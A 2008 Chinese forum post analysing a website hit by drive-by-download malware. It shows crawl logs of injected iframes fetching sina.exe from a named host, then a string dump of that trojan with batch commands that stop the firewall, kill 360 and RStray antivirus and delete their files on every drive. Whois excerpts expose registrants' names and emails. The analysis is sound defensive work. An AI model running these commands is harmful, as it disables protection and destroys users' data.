|
|
发表于 2008-9-14 20:16:44
|
显示全部楼层
发现挂马
Log is generated by FreShow.
[wide]http://www.lwlms.com/
[script]http://%61%76%65%32%2E%63%6E
[frame]http://asp-15.cn/ilink.html
[script]http://asp-15.cn/swfobject.js
[frame]http://asp-15.cn/flink.html
[frame]http://%61%76%65%32%2E%63%6E/http:\/\/www.wyf009.cn\/b2.htm
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://www.lwlms.com/Scripts/AC_RunActiveContent.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
进入分析阶段,稍后
公布结果
Log is generated by FreShow.
[wide]http://www.lwlms.com/
[script]http://%61%76%65%32%2E%63%6E
[frame]http://asp-15.cn/ilink.html
[script]http://asp-15.cn/swfobject.js
[frame]http://asp-15.cn/flink.html
[frame]http://%61%76%65%32%2E%63%6E/http:\/\/www.wyf009.cn\/b2.htm
[frame]http://asp-15.cn/fxx.htm
[frame]http://www.hrz010.cn/a1/fx.htm
[frame]http://www.hrz010.cn/a1/ilink.html
[frame]http://www.hrz010.cn/a1/flink.html
[frame]http://www.hrz010.cn/a1/ms06014.htm
http://www.zmjjjyy.cn/new/a1.css
[frame]http://www.hrz010.cn/a1/GLWORLD.html
[frame]http://www.hrz009.cn/sina.htm
[object]http://down.hs7yue.cn/down/sina.exe DownloadAndInstall
[frame]http://www.hrz010.cn/a1/ss.html
[frame]http://www.hrz010.cn/a1/Thunder.html
[frame]http://www.hrz010.cn/a1/real.htm
[frame]http://www.hrz010.cn/a1/Real.html
[script]http://js.users.51.la/1936348.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://www.lwlms.com/Scripts/AC_RunActiveContent.js
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
[script]http://%61%76%65%32%2E%63%6E
继续 深入。稍后
sina.exe 已经是已知病毒
// 由 PE Explorer 创建 1.98 (www.heaventools.com)
// 文件名称: I:\电影下载\bingd\d\d\sina.exe
// 已创建 : 14.09.2008 20:27
// 类型 : 字符串列表
00402E78: 'SOFTWARE\Borland\Delphi\RTL',0
00402E94: 'FPUMaskValue',0
00403548: 0Dh,0Ah
00404820: 'SYSTEM_32.LST'
00404838: 'Come_system.dll'
00404A2C: ':\Program Files\Common Files\Microsoft Shared\MSInfo\'
00404C60: 'open',0
00404D88: '{5B77087D-AB76-4C22-B0A6-C34D1F438E55}',0
00404DB0: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks',0
00404E00: 'CLSID\{5B77087D-AB76-4C22-B0A6-C34D1F438E55}'
00404E38: '\InProcServer32'
00404E48: 'Apartment',0
00404E54: 'ThreadingModel',0
004050DC: 'MicroSoft.bat'
004050F4: ':try'
00405104: 'del "'
00405114: '"'
00405120: 'if exist "'
00405134: ' goto try'
00405148: 'del %0'
00405150: 'open',0
0040531C: 'mfc.bat'
0040532C: [email=]'@echo[/email] off'
00405340: 'set s=TASKKILL'
00405358: 'copy %0 %windir%\system32\cmd.bat'
00405384: 'attrib %windir%\system32\cmd.bat +r +s +h'
004053B8: 'net stop sharedaccess >nul'
004053DC: '%s% /im 360* /f >nul'
004053FC: '%s% /im RStray /f >nul'
0040541C: 'net stop Shadow" "System" "Service'
00405448: 'set alldrive=d e f g h i j k l m n o p q r s t u v w x y z'
0040548C: 'for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul'
00405514: 'for %%a in (c %alldrive%) do del %%a:\RStray* /f /s /q >nul'
00405550: 'open',0
00405640: 'Come_system'
00405C24: 'fsfsfsfds'
00405C38: 0Dh,0Ah
00405C44: 'fdsafsawewr'
00405C58: 'fdsaffsdfasawewr'
00405C74: 09h,0Ah
00405C80: '1'
00405E8C: '0'
00405E98: '-'
0040611C: '-'
00406188: 'mzxr'
00406268: 'MsgHookOn',0
00406274: 'MsgHookOff',0
00406280: 'BAIDUDll',0
0040628C: 'ListBox',0
004065A0: 'MZ'
0040664C: '\drivers\etc\hosts'
004066E4: 'tiantiandouxuyaoniaiwodexinsiyounicaiwodexiaoshihouchaonaorenxindeshihou'
(中文意思:天天都需要你哎我的心思有你才我的小时候吵闹人心的时候) 我 妈 这么牛逼!
00406BC0: 'ertyuioiuytr'
00406BD8: 'ertyuFSDioiuytr'
00406BF0: 'Microsoft Shared\MSInfo'
00406C10: '?x='
00406C1C: '&y='
00406C28: 'Come_System.bak'
00406C40: 'Come_System.sys'
00406C58: 'fsdauoiuweruoi'
00406C68: 'DLLFILE',0
00406C78: 'fesjlkiuweruoi'
00406C88: 'wininit.ini',0
00406C94: 'rename',0
00406C9C: 'BAIDUExe',0
00406CA8: 'ListBox',0
00406CB0: 'BAIDUDll',0
0040705C: 'Error',0
00407064: 'Runtime error at 00000000',0
WHois 信息
Whois Record for Hrz010.cn ( Hr z 010 )
Name Server:ns.xinnet.cn
Front Page Information
Website Title: Error
Title Relevancy 0%
AboutUs: Wiki article on Hrz010.cn
SEO Score: 60%
Terms: 16 (Unique: 12, Linked: 0)
Images: 0 (Alt tags missing: 0)
Links: 0 (Internal: 0, Outbound: 0)
Indexed Data
Registry Data
Created: 2008-09-11
Expires: 2009-09-11
Whois Server: whois.cnnic.net.cn
Server Data
Response Code: 403
Domain Status: Registered And No Website
DomainTools Exclusive
Registrant Search: "毛新泽" owns about 2 other domains
Email Search: is associated with about 4 domains
Monitor Domain: Set Free Alerts on hrz010.cn
Free Tool:
Whois Record
Domain Name: hrz010.cn
ROID: 20080911s10001s66983440-cn
Domain Status: ok
Registrant Organization: 毛新泽
Registrant Name: 毛新泽
Administrative Email: 564564@tom.com
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns.xinnetdns.com
Network
Response Code: 403
Domain Status: Registered And Active Website
DomainTools Exclusive
Email Search: is associated with about 4 domains
Dedicated Hosting: zmjjjyy.cn is hosted on a dedicated server.
Monitor Domain: Set Free Alerts on zmjjjyy.cn
Free Tool:
Whois Record
Domain Name: zmjjjyy.cn
ROID: 20080819s10001s92309805-cn
Domain Status: ok
Registrant Organization: 展凌云
Registrant Name: 展凌云
Administrative Email: 6717520@qq.com 灭了他这个QQ 举报传播木马
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns.xinnetdns.com
Name Server:ns.xinnet.cn
Registration Date: 2008-08-19 14:56
Expiration Date: 2009-08-19 14:56
哎一时心急发快了。把刚抓的新的也压在一起,更新
[ 本帖最后由 molicn 于 2008-9-14 21:11 编辑 ] |
评分
-
查看全部评分
|
[复制链接]
发表于 2008-9-14 20:20:01
楼主
